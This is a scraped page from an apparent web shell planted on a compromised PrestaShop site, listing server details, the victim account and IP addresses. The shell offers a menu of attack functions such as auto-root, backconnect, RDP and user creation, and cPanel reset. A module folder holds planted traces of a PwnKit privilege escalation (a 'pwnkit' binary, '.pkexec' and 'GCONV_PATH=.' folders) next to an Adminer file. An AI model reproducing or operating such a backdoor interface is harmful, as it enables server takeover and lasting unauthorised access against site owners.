Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
modules /
ps_facetedsearch /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
_dev
[ DIR ]
drwx---r-x
config
[ DIR ]
drwx---r-x
img
[ DIR ]
drwx---r-x
src
[ DIR ]
drwx---r-x
upgrade
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.bablerc
47
B
-rw----r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
composer.lock
105.27
KB
-rw----r--
config.xml
494
B
-rw----r--
config_fr.xml
553
B
-rw-rw-r--
delete.gif
213
B
-rw----r--
index.php
1.09
KB
-rw----r--
logo.png
7.42
KB
-rw----r--
package-lock.json
487.72
KB
-rw----r--
ps_facetedsearch-attribute-ind...
1.26
KB
-rw----r--
ps_facetedsearch-clear-cache.p...
1.16
KB
-rw----r--
ps_facetedsearch-price-indexer...
1.38
KB
-rw----r--
ps_facetedsearch.php
66.08
KB
-rw----r--
ps_facetedsearch.tpl
992
B
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
webpack.config.js
1.72
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ps_facetedsearch-attribute-indexer.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License 3.0 (AFL-3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/AFL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * @author PrestaShop SA <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/AFL-3.0 Academic Free License 3.0 (AFL-3.0) */ require_once __DIR__ . '/../../config/config.inc.php'; require_once __DIR__ . '/ps_facetedsearch.php'; if (substr(Tools::encrypt('ps_facetedsearch/index'), 0, 10) != Tools::getValue('token') || !Module::isInstalled('ps_facetedsearch')) { exit('Bad token'); } Shop::setContext(Shop::CONTEXT_ALL); $psFacetedsearch = new Ps_Facetedsearch(); $psFacetedsearch->indexAttributes(); $psFacetedsearch->indexFeatures(); $psFacetedsearch->indexAttributeGroup(); echo 1;
Close